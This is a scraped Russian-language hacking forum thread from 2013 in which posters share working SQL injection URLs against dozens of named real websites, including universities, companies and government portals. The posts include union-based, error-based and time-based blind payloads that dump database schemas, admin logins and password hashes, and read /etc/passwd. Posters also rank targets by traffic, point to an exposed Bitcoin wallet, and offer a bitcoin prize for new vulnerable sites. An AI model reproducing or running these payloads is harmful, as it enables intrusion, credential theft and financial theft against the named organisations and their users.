Note: Форум phpBB в подарок!
Кафедра физики. Сибирской Государственной Геодезической Академии
Code:
http://physics-ssga.ru/news.php?id=-2+union+select+1,%28select%28@x%29from%28select%28 @x:=0x00%29,%28select%28null%29from%28information_ schema.columns%29where%28table_schema!=0x696e666f7 26d6174696f6e5f736368656d61%29and%280x00%29in%28@x :=concat%28@x,0x3c62723e,table_schema,0x2e,table_n ame,0x3a,column_name%29%29%29%29x%29,3,4,5+--+
Телекоммуникационная компания ООО "МЁБИУС Телеком"
Code:
http://www.mebi.us/out.php?id=-5+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16+--+
Note: Крутите, как хотите, но я не нашёл.!
СПОРТ ТРЕЙД
Code:
http://www.sport-trade.ru/out.php?id=9%27+union+select+1,2,3,4,5,6,7,8,9,10, 11+--+
Прим: Аналогично предыдущему.
Спроси Алену)
ТИЦ 750
трафик почти 10к
PHP:
http://www.tonnel.ru/kino.php?id=-245'+union+select+1,2,3,4,5,6,SQL,8,9+--+
version()-5.0.45
user()-tonel@localhost
database()-savinov
Дальше перестал ковырять
UP
pr 5
http://
www.hu.
edu
.pk
/viewfaculty.php?id=12'+union+select+concat_ws(0x3a ,version(),database(),user()),2,3,4,5,6,7,8,9,10,1 1,12,13,14+--+
=============================================
Code:
http://www.vvsforum.no/stilling.php?id=-134+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28--
Unknowhacker
15.10.2013, 18:45
Beta SQL
Code:
http://www.euraxess.hr/sitegenius/article.php?aid=-898+order+by+26+--+
http://www.narom.no/artikkel.php?aid=2&bid=-56+union+select+1,2,3,4,5,6+--+&oid=944
http://www.muzkom.net/afisha/show.php?aid=138+order+by+4+--+
http://www.piiter.ru/authors2.php?aid=36&pid=-629+union+select+1,2,3,version%28%29,5,6,7,8,9,10, 11,12,13,14,15,16+--+
http://www.yivoinstitute.org/library/index.php?aid=97tid=112+order+by+9+--+
http://mat-reshebnic.ru/primer.php?id=-14%27+union+select+1,2,version%28%29+--+
Code:
SHIVA LTD
http://www.shvidi.com/ru/product_list.php?action=company&typeID=9&id=-17+union+select+1,2,3,4,5,6,%28select%28@x%29from% 28select%28@x:=0x00%29,%28select%28null%29from%28d 60158493.users%29where%280x00%29in%28@x:=concat%28 @x,0x3c62723e,user_name,0x3a,user_pass%29%29%29%29 x%29,8+--+
Loki
http://www.lokiusa.com/product_list.php?cat=-3+union+select+1,%28select%28@x%29from%28select%28 @x:=0x00%29,%28select%28null%29from%28information_ schema.columns%29where%28table_schema!=0x696e666f7 26d6174696f6e5f736368656d61%29and%280x00%29in%28@x :=concat%28@x,0x3c62723e,table_schema,0x2e,table_n ame,0x3a,column_name%29%29%29%29x%29,3,4,5,6,7,8,9 ,10,11,12+--+
Win32BOT
17.10.2013, 19:27
Code:
http://www.catalystpics.co.uk/work.php?id=-7+union+select+1,2,3,4,5,6,7,concat_ws(0x3a ,version(),database(),user()),9,10,11,12,13,group_ concat(table_name),15+from+information_schema.tabl es+where+table_schema=database()+--+
Code:
http://www.irishsanghatrust.ie/news.php?id=-33+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18--
UP
http://
www.dakotaresidences.net
/dev/label.php?id=13+or+1+group+by+concat((select+versi on()),0x00,floor(rand(0)*2))having+min(0)+--+
=============================================
http://
www.shepperd-fox.co.uk
/client.php?id=99 || 1=2+union+select+1,2,3,4,insert(version(),1,0,inse rt(0x3a,1,0,database())),6,7+--+
=============================================
http://
www.ksymktg.com
/dev/label.php?id=(12)||(@:=1)group by concat(version(),@:=!@)having min(0)+--+
=============================================
http://encycl.anthropology.ru/article.php?id=1+union+select+1,version(),3,4,5,6, 7,8,9,10+--+
karcher.ru
2800 тиц, 9к трафа
http://www.karcher.ru/cms/templates/karcher2008/popupProduct.php?version=ru&versionID=224&language=ru-RU&username=&userID=4222&projecttype=karcher2008&pageID=1&pageIDsql=25930944&CatAlias=-13988060+union+select+1,2,3,4,version(),6,7,user() ,9,10+--+
http://www.spezrezerv.ru/index.php?cat=2%20union%20select+1,version()--
Win32BOT
25.10.2013, 20:37
Code:
http://www.me-doc.com.ua/index.php?id=-3543+union+select+1,2,concat_ws(0x3a ,version(),database(),user()),4,5,6,7,8,9,10,11,gr oup_concat(table_name)+from+information_schema.tab les+where+table_schema=database()+--+
Code:
http://limpopo-fishing.kz/index.php?tid=662+union+select+concat_ws(0x3a ,version(),database(),user()),2,group_concat(table _name),4,5+from+information_schema.tables+where+ta ble_schema=database()+--+
Code:
http://pushingpetals.com/buy.php?id=-55+union+select+1,concat_ws(0x3a ,version(),database(),user()),group_concat(table_n ame),4,5,6,7,8,9,10,11,12+from+information_schema. tables+where+table_schema=database()+--+
Code:
http://o-tula.net/o-server/check-in/protokol.php?id=-24+union+select+concat_ws(0x3a ,version(),database(),user())+--+
dobryiDyaDya
25.10.2013, 22:03
вот:
http://xn----8sbaki6bhedrhug.xn--p1ai/gallery?GSID=2&level=2'
Win32BOT
26.10.2013, 00:14
Code:
http://helukabel.su/index.php?id=-68+union+select+1,concat_ws(0x3a,version(),databas e(),user()),3,group_concat(table_name),5,6,7,8,9,1 0,11+from+information_schema.tables+where+table_sc hema=database()+--+
Win32BOT
26.10.2013, 22:23
Code:
http://futuresfins.com/fin-detail.php?id=-173+union+select+concat_ws(0x3a,version(),database (),user()),group_concat(table_name),3,4,5,6,7,8,9, 10,11+from+information_schema.tables+where+table_s chema=database()+--+
Unknowhacker
28.10.2013, 13:11
Code:
http://www.domkultury.su/news.php?newsid=-41+union+select+1,2,%28select%28@x%29from%28select %28@x:=0x00%29,%28select%28null%29from%28informati on_schema.columns%29where%28table_schema!=0x696e66 6f726d6174696f6e5f736368656d61%29and%280x00%29in%2 8@x:=concat%28@x,0x3c62723e,table_schema,0x2e,tabl e_name,0x3a,column_name%29%29%29%29x%29,4,5,6+--+
http://www.biomedis.ru/news.php?newsId=-80+and+1=2+union+select+1,2,3,4,5,6+--+
http://www.trunov.com/news.php?newsid=-397+union+select+1,2,%28select%28@x%29from%28selec t%28@x:=0x00%29,%28select%28null%29from%28informat ion_schema.columns%29where%28table_schema!=0x696e6 66f726d6174696f6e5f736368656d61%29and%280x00%29in% 28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name%29%29%29%29x%29,version%2 8%29,5,6,7,8,9+--+&page=1
http://www.ipoteka.md/ru/news.php?NewsID=-483+union+select+1,%28select%28@x%29from%28select% 28@x:=0x00%29,%28select%28null%29from%28informatio n_schema.columns%29where%28table_schema!=0x696e666 f726d6174696f6e5f736368656d61%29and%280x00%29in%28 @x:=concat%28@x,0x3c62723e,table_schema,0x2e,table _name,0x3a,column_name%29%29%29%29x%29,3,4,5,6,7,8 ,9,10,11,12,13,14,15,16+--+
http://www.dia-m.ru/news.php?newsid=-147+union+select+1,2,3,4,5,6,7,8,9,10,11,12,%28sel ect%28@x%29from%28select%28@x:=0x00%29,%28select%2 8null%29from%28mysql.user%29where%280x00%29in%28@x :=concat%28@x,0x3c62723e,user,0x3a,password%29%29% 29%29x%29,14,15,16+--+
http://jewishmariupol.com.ua/news.php?newsid=-856+union+select+1,2,3,%28select%28@x%29from%28sel ect%28@x:=0x00%29,%28select%28null%29from%28ridnak rai_jewish.users%29where%280x00%29in%28@x:=concat% 28@x,0x3c62723e,username,0x3a,password%29%29%29%29 x%29,5+--+
http://www.mastergrisha.ru/news.php?newsid=-71+union+select+1,%28select%28@x%29from%28select%2 8@x:=0x00%29,%28select%28null%29from%28information _schema.columns%29where%28table_schema!=0x696e666f 726d6174696f6e5f736368656d61%29and%280x00%29in%28@ x:=concat%28@x,0x3c62723e,table_schema,0x2e,table_ name,0x3a,column_name%29%29%29%29x%29,3,4+--+
http://www.servicesat.ru/news.php?newsid=-49+union+select+1,2,version%28%29,4,5+--+
http://www.consol.crimea.ua/news.php?newsid=338%27]Consol[/URL]
Бизнес Центр "Парус" (http://www.parus.biz/news.php?newsid=15+order+by+4+--+)
Code:
http://www.perthanddistrictanglersassociation.com/News.php?newsID=-87+union+select+1,2,3,4,concat_ws(0x3a,version(),u ser(),database()),6,7,8,9--
Sum.cogitans
29.10.2013, 08:32
Вот знаете, утро как-то сразу задалось настроение прям радостное сразу.
Официальный сайт Анфисы Чеховой:
Code:
www.achekhova.ru/img.php?id=-99+UNION+SELECT+1,2,3,group_concat(user(),0x3a,ver sion(),0x3a,database())+--+&rub=press
P.s. Результат в сорсе смотрите, или в URL изображения.
P.p.s. Ну ловко ребята вывод ошибки скрыть попытались. Юзаем cmd+a\ctrl+a.
UPD Нарыл схему DB crawlp - URL (http://fernando.quiroga.free.fr/Tennis_backup/csclichytennisco.sql), дальше сами, а мне работать пора .)
На закуску:
Code:
http://www.osnova-pc.ru/prosmotr_posta.php?id=-85'+UNION+SELECT+1,2,group_concat(user(),0x3a,vers ion(),0x3a,database()),4,5,6,7,8,9,10,11+--+
joomla
ТИЦ\PR шлак
Траф 2.5 в неделю
Позиции в яндексе интересные: http://pr-cy.ru/a/www.osnova-pc.ru
http://bitvisitor.com/v2/images/bitvisitor_large.png
http://bitvisitor.com/ - заработай биткоины за просмотр сайтов
на главной в заголовке Referer
MySQL AND/OR time-based blind
GET / HTTP/1.1
User-agent: Vasya with IE
Host: bitvisitor.com
Referer: '||(SELECT 'TXIo' FROM DUAL WHERE 3847=3847 AND 4515=IF((QUARTER(NULL) IS NULL),SLEEP(1),4515) )||'
Connection: close
web server operating system: Linux Debian 6.0 (squeeze)
web application technology: PHP 5.3.3, Apache 2.2.16
banner: '5.1.66-0+squeeze1-log'
current user: root
database management system users password hashes:
root [2]:
password hash: *AC3AC8E16952F531C8E9FE03ECD18DA0E0E771C7
password hash: *ED5785C53CE4F9F7A220427C0F14905F92E6695B
File_Priv=Y
можно LOAD_FILE('**********/.bitcoin/wallet.dat')
на кошеле половинка биткоина (~100$)
я не трогал, кто хочет заработать вперед
Unknowhacker
30.10.2013, 21:35
ТЕХНО-М
Code:
http://www.techno-m.ru/index.php?prod=93+order+by+8+--+
Hi-tec.com.ua
Code:
http://hi-tec.com.ua/index.php?idmainproduct=-91+union+select+1,2,%28select%28@x%29from%28select %28@x:=0x00%29,%28select%28null%29from%28hiteccomu a_kbt.kbt_user%29where%280x00%29in%28@x:=concat%28 @x,0x3c62723e,uname,0x3a,pass%29%29%29%29x%29,4,5, 6,7,8,9+--+
http://www.bitcoinlivebets.com/banner/468x60.jpg
time-based blind
http://www.bitcoinlivebets.com/index.php?action=livewetten&qf=%22%2b(select(0)from(select(sleep(6)))v)%2b%22&u=livebereich
биткоэны Отаке!
КОНКУРС: кто постит следующую уязвимость на Биткоен сайте получает от меня 1 BTC ~ 197$ (начало 31.10.13, конец 02.11.13)
P.S. ОБЯЗАТЕЛЬНО!!! присутствие слова bitcoin в названии сайта.
www.igornikolaev.ru
Офф сайт Игоря Николаева
PHP:
http://www.igornikolaev.ru/music/textout.php?id=94+or+1+group+by+concat((),0x00,flo or(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:130||PR:
==================================================
www.inconnect-group.ru
PHP:
http://www.inconnect-group.ru/pressrelease/?id=96+limit+0,0+union+select+1,2,3,4,,6,7,8,9--+
db 5 version
CY:700||PR:5
==================================================
www.agidis.ru
PHP:
http://www.agidis.ru/?id=98+or+1+group+by+concat((),0x00,floor(rand(0)* 2))having+min(0)+or+1--+
db 5 version
CY:30||PR:2
==================================================
www.landscrona.ru
PHP:
http://www.landscrona.ru/tales/index.php?id=115+limit+0,0+union+select+1,2,,4,5,6 ,7,8,9,10,11,12,13,14,15,16--+
db 5 version
CY:450||PR:4
==================================================
CY - 120
PR - 5
Вывод в исходники, ищите по разделителю ~|~
tarasovka.ukrmisto.net/company.php?id=999999.9'+union+select+(select+conc at(concat_ws(0x7e7c7e,users.id,users.login,users.p assword))+from+`ukrmisto_misto`.users+where+users. id=1),0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c ,0x7c,0x7c,0x7c +--+
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Code:
http://www.northernoutpost.com/news.php?id=13+AND+1=2+UNION+SELECT+1,2,3,version% 28%29,5,6,7,8+--+
Code:
http://www.almarecords.com/news.php?id=39+AND+1=2+UNION+SELECT+1,2,version%28 %29,4,5,6,7,8,9,10,11+--+
Букинг отелей:
http://glenavonhotel.co.uk/offer_one.php?id=999999.9'+union+select+0x7c,0x7c, 0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,0x7c,(sele ct+concat(group_concat(table_name))+from+informati on_schema.tables+where+table_schema='andycameron') ,0x7c,0x7c,0x7c,0x7c,0x7c --+
palec2006
03.11.2013, 20:58
Системы безопасности))
http://www.aktivsb.ru/price_new.php?catid=-1+union+all+select+1,2,(select+group_concat(concat (unhex(Hex(cast(managers.login+as+char))),0x3A),un hex(Hex(cast(managers.passwd+as+char)))+SEPARATOR+ 0x3C6272202F3E)+from+`aktivsb`.managers),4,5,6--
db:5.5.31
CY:1000
PR:4
Траф:10к
мыльник достоин внимания.
Code:
http://www.pangeaday.org/filmDetail.php?id=-47+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database()),8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23--
http://www.lukoil.ro/statii.php?id=-232+union+select+1,2,3,4,5,6,7,8,9,0,1,2,concat_ws (0x3a,version(),user(),database()),4,5,6,7,8,9,0,1 ,2,3,4,5,6,7,8,9+--+
pr:4
http://
www.colawp.com
/database/cola.php?cola_id=254 and if(substring(version(),1,1)=5,sleep(5),0)
pr:4
http://
www.hotelvilladelrio.com
/en/oferta.php?id=2+and+1=2+union+select+1,2,3,4,5,6,7 ,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22 ,23,24+--+
pr:7
http://
www.depkes.go.id
/index.php?vw=2&id=SNR.13100010' and (select 1 from (select count(*),concat((select password from jos_users where username like 0x61646d696e),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)a)+--+
Unknowhacker
07.11.2013, 20:46
http://avtodvornik.com.ua/?ID=goods&select=8+order+by+2+--+
Unknowhacker said:
http://avtodvornik.com.ua/?ID=goods&select=8+order+by+2+--+
Читай 2ой абзац 1ого пункта правил этой темы.
Старайся "доводить до ума" найденные инъекции.
www.avtodvornik.com.ua/?ID=goods&select=8 and (select 1 from(select count(*),concat(version(),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)a)+--+
upd
www.avtodvornik.com.ua/?ID=goods&select=8 and (select 1 from(select count(*),concat((select unhex(hex(cast(pass as char))) from admins),0x3a,floor(rand(0)*2))x from information_schema.tables group by x)a)+--+
Code:
http://www.asmube.com.br/noticias.php?id=-11+union+select+concat_ws(0x3a,version(),user(),da tabase()),2,3,4,5,6,7/*
Code:
http://www.licafusa.com.br/galeriadoscampeoes.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4--
Code:
http://www.noborder.org/item.php?id=-383+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27--
pr:7
тИЦ:30
http://
www.namibian.com.na
/indexx.php?id=5101+union+select+1,2,3,concat_ws(0x 3a,password,email),5,6,7,8,9 from users+--+&page_type=story_detail&category_id=3
pr:4
http://
www.poetv.com
/video.php?vid=127816+and+(if(ascii(mid((version()) ,1,1))=53,0,1))+--+
pr:3
http://
www.apisa.info
/politica.php?id=1'and(select+1+from(select+count(* ),concat((select+version()),0x00,floor(rand(0)*2)) x+from+information_schema.tables+group+by+x)a)--+
Unknowhacker
11.11.2013, 19:54
Code:
http://www.rusderjavnaya.info/article.php?art_id=758+and+1=0+union+select+1,vers ion%28%29+--+
Code:
http://www.diavia.ru/index.php?art_id=-6997+union+select+1,2,3,version%28%29,5,6,7+--+&p_id=6894&PHPSESSID=25e142491b9349684dbe1cb0c7216bdd
4.0.26-log
Host:
_http://dumskaya.net
Injection:
Code:
http://dumskaya.net/post/-1%27+or+1=if(substr((@@version),1,1)=5,1,2)+--+/
version() = 5.01
TYC = 1000
PR = 5
http://www.kdoexpo.com/cadeau-cadre-photo-numerique-pfx-1000.php?id=199+UNION+SELECT+1,2,concat_ws(0x3a,ve rsion(),database(),user()),4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,3 0,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46, 47,48,49,50,51,52,53,54,55+LIMIT+1,1--
4.0.25-standard-log:kdoexpo:kdoexpo@10.0.84.190
Code:
http://www.spbf.pt/article.php?sid=-15+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6--
5.0.96-community:spbfuser_spbf765@localhost:spbfuser_spbf site
DezMond™
20.11.2013, 15:45
PR7
http://www.polimi.it/index.php?id=3351&uid=131&k_cf=10&annoAA=2012'&L=0&k_corso_la=-1139+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24+--+
Code:
http://www.italyfutbol.ru/rubrika.php?id=-11+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5--
kingbeef
22.11.2013, 07:01
http://www.ssangyong.by/ru/pages/index.php?id=27-9.999+union+select+1,2,3,4,5,6,version(),8,9,10,11 ,12,13,14,15,16,17,18,19,20--
Argentine
Code:
http://www.cdh-protesis.com.ar/sitio/item.php?idcd=-37+union+select+1,concat_ws(0x3a,version(),user(), database()),3,0x4861636b6564206279205365706f,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18--
Code:
http://www.elgalponrosario.com.ar/sitio/item.php?idcd=115&cat=-15+union+select+1,concat_ws(0x3a,version(),user(), database()),3--
Code:
http://www.metalurgicavaldez.com.ar/sitio/item.php?idcd=201&cat=-1460+union+select+1,concat_ws(0x3a,version(),user( ),database()),3--
http://
www.maffeistefano.it
/politica.php?id=12+and+1=2+union select 1,version(),3,4,5,6,7,8,9,10,11+--+
===========================================
http://
www.zontahkeast.org
/en/service/service.php?id=-4+union+select+1,2,version(),4+--+
===========================================
http://
www.residences-botanique.com
/Dev3/label.php?id=13+or+1+group+by+concat((select+versi on()),0x00,floor(rand(0)*2))having+min(0)+--+
===========================================
pr:4
http://
www.gemer.org
/clanok.php?chlan=eng&id=7'+union+select+version()+--+&akcia=
===========================================
http://
www.ulsa.es
/oferta.php?id=-000000001P'+union+select+1,2,3,4,5,6,version(),8,9 ,10,11,12,13,14+--+
===========================================
http://
www.dbrush.net
/sub-equipment.php?SID=27&SID2=-2'+union+select+1,2,3,4,5,6,7,8,version(),10,11,12 ,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,2 9,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45, 46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62 ,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,7 9,80,81,82,83,84,85,86,87,88,89,90,91,92,93+--+
===========================================
http://
www.aquarius.com.sg
/service.php?id=1+and+1=2+union+select+1,concat_ws( 0x3a,user_name,user_password),3,4,5 from user+--+
===========================================
Code:
http://www.orsna.gov.ar/usuarios/capitulosleyconsumidor.asp?cod=5'+or+1=(select+db_ name())--
Code:
http://www.orsna.gov.ar/usuarios/capitulosleyconsumidor.asp?cod=5'+or+1=(select+sys tem_user)--
Code:
http://www.orsna.gov.ar/usuarios/capitulosleyconsumidor.asp?cod=5'+or+1=(SELECT+TOP +1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES)--
Code:
http://www.orsna.gov.ar/usuarios/capitulosleyconsumidor.asp?cod=5'+or+1=(SELECT+TOP +1+TABLE_NAME+FROM+INFORMATION_SCHEMA.TABLES+WHERE +TABLE_NAME+NOT+IN+(SELECT+TOP+1+TABLE_NAME+FROM+I NFORMATION_SCHEMA.TABLES))--
дальше сами, тут куча бд и в каждой куча в квадрате таблиц...
Unknowhacker
25.11.2013, 21:35
ОАО "Новороссийское морское пароходство" СКФ Новошип
Code:
http://www.novoship.ru/info-view.php?id=115%27+union+select+1,2,3,concat_ws%28 0x3a,name,pass%29,5,6,7,8,9,10,11,12,13,14,15+FROM +nov_users+--+
Note: Админка (http://www.novoship.ru/cpanel.php) - profit!
DeepBlue7
28.11.2013, 05:15
Code:
http://www.foxflannel.com/memories-article.php?id=1'+union+select+1,concat_ws(0x3f,ta ble_name,version()),3,4,5,6,7+from+information_sch ema.tables+limit+50,1+union+select+1,2,3,4,5,6,7--'
// Нарушение Правил, перечитайте /showpost.php?p=2966352&postcount=5 (https://antichat.live/showpost.php/p/2966352/postcount/5/) и постарайтесь больше не нарушать
// BigBear
Code:
http://www.marvista.net/programing-catalog.php?id=350&cat=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,co ncat_ws(0x3a,version(),user(),database()),16,17,18 ,19,20,21,22,23,24,25,26,27,28--
Ctrl+U --> Строка 148 --> 5.0.96-log:marvistadb@97.74.144.231:marvistadb
t3cHn0iD
29.11.2013, 18:44
movieline.ru/auth.php
В поле псевдоним вводим:
Code:
") or ("a"="a
Code:
http://www.desdetupc.com.ar/sitio/item.php?idcd=248&cat=-0+union+select+concat_ws(0x3a,version(),user(),dat abase()),2,3,4,5,6,7,8,9,10,11,12,13--
Code:
http://www.ibopeplus.com.ar/item.php?tabla=nutricion&id=-5+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7--
Code:
http://polimiel.com.ar/sitio/item.php?idcd=-18+union+select+1,concat_ws(0x3a,version(),user(), database()),0x4861636b6564206279205365706f,4,5,6,7 ,8,9,10,11,12,13,14&cat=7
DezMond™
03.12.2013, 17:43
PR5
http://www.dlrg.de/gr/lernen/lehrgaenge.html?tx_pagephpcontent_pi1%5BSEM_NR%5D=-23151-13'+UnIOn/**//**//**//**/+/**//**//**//**//**//**//**//**//**//**//**/sELeCt+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33+fro m+information_schema.tables+--+
ТИЦ: 1200
Pr: 3
http://
www.biysk.ru
/print.phtml?news=on&id=258+and+1=(if(ascii(substr(@@version,1,1))=53,1 ,0))+--+
===============================================
Code:
http://www.cardon.com.ar/nota.php?id=-184+union+select+1,2,3,4,5,6,7,8,0x4861636b6564206 279205365706f,10,concat_ws(0x3a,version(),user(),d atabase()),12,13,14--
Code:
http://www.isca.org.ar/nav_notas.php?id=-71+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database()),0x4861636b656420627920536570 6f,9,10,11,12,13,14,15--
Code:
http://lacupulagaleria.com.ar/sitio/evento.php?id=-21+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,0x4861636b6564206279205365706f--
University of Tennessee System
University of Tennessee System
Dept. of Civil & Environmental Engineering
Code:
http://cee.utk.edu/announcements/details.php?id=-15+union+select+1,2,3,4,5,6,concat_ws(0x3a,version (),user(),database()),8,9,10,11,0x4861636b65642062 79205365706f,13,14,15--
psihoz26
06.12.2013, 05:19
Code:
http://videogames.eprst.ru/news.php?id=321169.9+union+select+concat(user(),0x 3a,file_priv),2,load_file(0x2f6574632f706173737764 )+from+mysql.user+where+user=0x6e657773+--+
Code:
http://www.cruzroja.org.ar/new/noticia.php?id=188&cat=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,0x4861636b6564206279205365706f,5,6,7, 8,9,10,11,12--
Code:
http://www.riehr.com.ar/detalleEdu.php?id=-6+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),0x4861636b6564206279205365706f,4,5,6,7, 8,9,10,11,12,13,14,15--
Code:
http://www.redfuv.org.ar/boletin_amp.php?id=-58+union+select+1,2,0x4861636b6564206279205365706f ,4,concat_ws(0x3a,version(),user(),database()),6--
Навеяно вот этой (https://antichat.live/showthread.php/p/3632636/) темой.
Знаю, что компаний по ИБ не так уж и много.
Но и они огорчили.
Стыдно, господа, а ещё работаете с 2004 года =(
Inject
Code:
http://chart.av-comparatives.org/awards_by_vendor.php?venID=2+and+substr((@@version ),1,1)=5
Blind. 5-ая ветка MySQL.
Тиц 400
Pr 6
Code:
http://www.calidus.ro/en/news.php?id=-2+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,0x4861636b6564206279205365706f--
Code:
http://www.casopisveronica.cz/rubrika.php?idr=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4--
Code:
http://www.teatro-elcirculo.com.ar/item.php?iditem=-69+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11,12,13,14,15,16/*
nemaniak
08.12.2013, 00:47
retailmagazine.ru ТИЦ-475 PR-5 blind
Code:
http://retailmagazine.ru/tofirmcard.php?num=1573+and+5=substring(version(), 1,1)+--+
Code:
http://retailmagazine.ru/tofirmcard.php?num=1573+and+4=substring(version(), 1,1)+--+
learning.pmi.org PR-5
Code:
http://learning.pmi.org/course-detail.php?id=-2018+UNION+SELECT+1,concat_ws(0x3a,version(),user( ),database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32+--+
Code:
5.0.96-log:pmiprof@184.168.193.190:pmiprof
reps.ru ТИЦ-200
Code:
http://reps.ru/print.php?news=-2640'+union+select+1,2,3,4,concat_ws(0x3a,version( ),user(),database()),6,7,8,9,0,11,12,13,14+--+
Code:
5.5.29-MariaDB-log:repsru@rslocal:repsru
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot